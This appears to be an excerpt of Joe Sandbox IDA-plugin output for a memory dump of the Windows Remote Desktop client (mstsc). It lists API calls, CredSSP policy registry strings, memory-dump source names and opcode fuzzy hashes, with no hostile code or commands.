                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Monitor$FromInfoWindow
                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                        • API String ID: 332468611-3887548279
                                                                                                                                                                                        • Opcode ID: cb1fecb9a226f67c0d4276f442790e607791e8611ee52c1c85b944cd1ee050cc
                                                                                                                                                                                        • Instruction ID: 63576d4e629e52082ee1f8d082a440cae78a730e20bf89eb6c2895d3ef92800e
                                                                                                                                                                                        • Opcode Fuzzy Hash: cb1fecb9a226f67c0d4276f442790e607791e8611ee52c1c85b944cd1ee050cc
                                                                                                                                                                                        • Instruction Fuzzy Hash: 63015275A11208AFDB14CFA5E889AEEB7F5EF49321F50406AE801A7240DB709804CF51
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation, xrefs: 00936BFA, 00936C07
                                                                                                                                                                                        • SYSTEM\CurrentControlSet\Control\Lsa\Credssp\PolicyDefaults, xrefs: 00936BF1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Open
                                                                                                                                                                                        • String ID: SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation$SYSTEM\CurrentControlSet\Control\Lsa\Credssp\PolicyDefaults
                                                                                                                                                                                        • API String ID: 71445658-4013566426
                                                                                                                                                                                        • Opcode ID: a6248de629cc25ab660c9f44e46713fc318ddbaf3c9fc66600b86a03e14286b7
                                                                                                                                                                                        • Instruction ID: 7facaf3022a9050bc603e56a7fc3fcd7551ec3a674fef36bfe6771d0c150b1a5
                                                                                                                                                                                        • Opcode Fuzzy Hash: a6248de629cc25ab660c9f44e46713fc318ddbaf3c9fc66600b86a03e14286b7
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FE05BB0751125EBEB1C05188C6BB367359E71031AF31826DB743DE2E1D65558045B50
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,00000000,00937412,00000000,00000000,0093766F,00000000,?,00000000,00000000,?), ref: 009373E4
                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000000,?), ref: 009373F2
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Resource$FindLoad
                                                                                                                                                                                        • String ID: MUI
                                                                                                                                                                                        • API String ID: 2619053042-1339004836
                                                                                                                                                                                        • Opcode ID: 566a9d56e52b74be3c5e3d0c83c88be27b55cca80a132a772cbbbfcf1c477cf5
                                                                                                                                                                                        • Instruction ID: 00c0934ef0e79efd83dcfafc9982aa7a812de8369f320876f02ff407f0e7dbce
                                                                                                                                                                                        • Opcode Fuzzy Hash: 566a9d56e52b74be3c5e3d0c83c88be27b55cca80a132a772cbbbfcf1c477cf5
                                                                                                                                                                                        • Instruction Fuzzy Hash: 38D012B228952177E62026597C0DFDB2A0CEB81B61F054042F820A5191DB949C42AAD5
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalAlloc.KERNEL32 ref: 00923C10
                                                                                                                                                                                        • memcpy.MSVCRT(00000000,00000000,?), ref: 00923C25
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocLocalmemcpy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 310742750-0
                                                                                                                                                                                        • Opcode ID: 752fd2b3083e7e5b38f641c100bdecfcb00a579058ecd45ed54443fdcf803986
                                                                                                                                                                                        • Instruction ID: e2b356ac7edbf3421fe5f90827d8fe15b6861f6eb17dbc4b998dfc4c4ef58f1a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 752fd2b3083e7e5b38f641c100bdecfcb00a579058ecd45ed54443fdcf803986
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D21373160072AABC7209E71AC05F6B76ACEBC0710F04C529FD59E6248DB38DA01DBA0